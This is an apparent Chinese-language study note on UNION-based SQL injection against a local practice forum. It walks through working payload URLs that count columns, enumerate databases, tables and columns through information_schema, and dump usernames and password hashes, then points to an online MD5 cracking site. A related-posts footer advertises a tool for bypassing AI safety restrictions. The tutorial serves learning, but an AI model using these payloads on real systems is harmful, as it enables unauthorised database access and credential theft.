SQL注⼊之union注⼊方式(学习笔记)

union查询注⼊是最基础的注⼊:在SQL中,UNION操作符⽤于合并两个或多个SELECT语句的结果。 union查询注⼊利⽤UNION关键字,可以追加⼀条或者多条额外的SELECT查询, 并将结果追加到原始查询中。联合查询会" 纵向" 拼接两个或多个SELECT语句的结果。

适用条件:1.存在注入点 2.注入前后要对应(union 前后两个 select 的结果集,应具有相同列数; union 前后两个 select 的结果集,对应列应是相同数据类型)

注入步骤:
1.判断 是否存在 注⼊点 及 注⼊的类型
2.使用order by 来查询列数,观察回显
3.获取数据库名
4.获取数据库中所有的表名
5.获取数据库中所有的表中的字段名
6.获取字段中的数据

1.判断 是否存在注⼊点及注⼊的类型

2.使用order by 来查询列数,观察回显

建议用⽕狐渗透版浏览器来打开本地靶场,以我打开的靶场为例子,输入

http://localhost/bbs/showmessage.php?id=1

http://localhost/bbs/showmessage.php?id=1 order by 1

http://localhost/bbs/showmessage.php?id=1 order by 5

从一一直尝试到五,如果到数字n报错则有(n-1)列,即有(n-1)个可能的注入点

判断出有4列,之后输入http://localhost/bbs/showmessage.php?id=id=-1 union select 1,2,3,4

这句话的目的是判断有几个点可以真正注入,有几列并不意味着都能注入

细心的读者一定会发现id=-1,这是希望正确的语句不去影响注入语句,故而写错。

到这里第一和第二步就都完成了

3.获取数据库名

输入http://localhost/bbs/showmessage.php?id=-1 union select 1,2,version(),database()

这是方法一,还有方法二

http://localhost/bbs/showmessage.php?id=id=-1 union select 1,2,version(),(select group_concat(schema_name) from information_schema.schemata)

这两种方法均能得到对应的版本号和数据库名,方法一获得自己的数据库名,方法二则是全部数据库名

(select group_concat(schema_name) from information_schema.schemata)

对应在Mysql中查询所有数据库名,还有简单版

id=-1 union select 1,2,version(),group_concat(schema_name) from information_schema.schemata

4.获取数据库中所有的表名

http://localhost/bbs/showmessage.php?id=-1 union select 1,2,version(), group_concat(table_name) from information_schema.tables where table_schema='jrlt'

我们来分析一下注入点

group_concat(table_name) from information_schema.tables where table_schema='jrlt'(查询'jrlt'数据库中的所有表)

5.获得数据库对应表中的所有字段

http://localhost/bbs/showmessage.php?id=-1 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='jrlt'

我们来分析一下注入点

group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='jrlt'

这里是查询'jrlt'数据库中的user表中的所有字段

6.获取字段中的数据

http://localhost/bbs/showmessage.php?id=-5 union select 1,2,3,concat(name,':',password) from users limit 0,1

id=-5 union select 1,2,3,concat(name,':',password) from users limit 0,1

分析注入点需要的是'jrlt'数据库中的user表中的name和password,选择我们所需要的内容

获取到的密码被加密成MD5格式,可以访问http://cmd5.com/来破解

相关推荐
一个在高校打杂的5 分钟前
honeypot之opencanary(轻量化蜜罐)
linux·网络安全·网络攻击模型·安全威胁分析·策略模式
X7x51 天前
堡垒机:企业运维安全的“数字守门人“
网络安全·网络攻击模型·安全威胁分析·堡垒机·安全架构
路baby2 天前
RCE漏洞的原理详细讲解并基于pikachu靶场的实战演戏
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·rce
X7x52 天前
网络流量分析(NTA):企业安全运营的“数字听诊器“
网络安全·网络攻击模型·安全威胁分析·安全架构·nta
Chockmans2 天前
春秋云境CVE-2022-28512(手工注入和sqlmap自动)保姆级教学
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2022-28512
X7x53 天前
网络入侵防御系统(IPS):从被动防御到主动拦截的网络安全革命
网络安全·网络攻击模型·安全威胁分析·安全架构·ips
X7x54 天前
网络入侵检测系统(NIDS):企业网络安全的守望者
网络安全·网络攻击模型·安全威胁分析·安全架构·nids
X7x55 天前
移动设备管理(MDM):企业数字化转型的安全基石
网络安全·网络攻击模型·安全威胁分析·安全架构·mdm
X7x56 天前
主机入侵检测系统(HIDS):企业安全的最后一道防线
网络安全·网络攻击模型·安全威胁分析·安全架构·hids
HackTwoHub7 天前
AI提示词注入绕过工具:一键绕过Codex/Claude安全限制,CTF夺旗与渗透测试必备神器
网络·人工智能·安全·web安全·系统安全·网络攻击模型·安全架构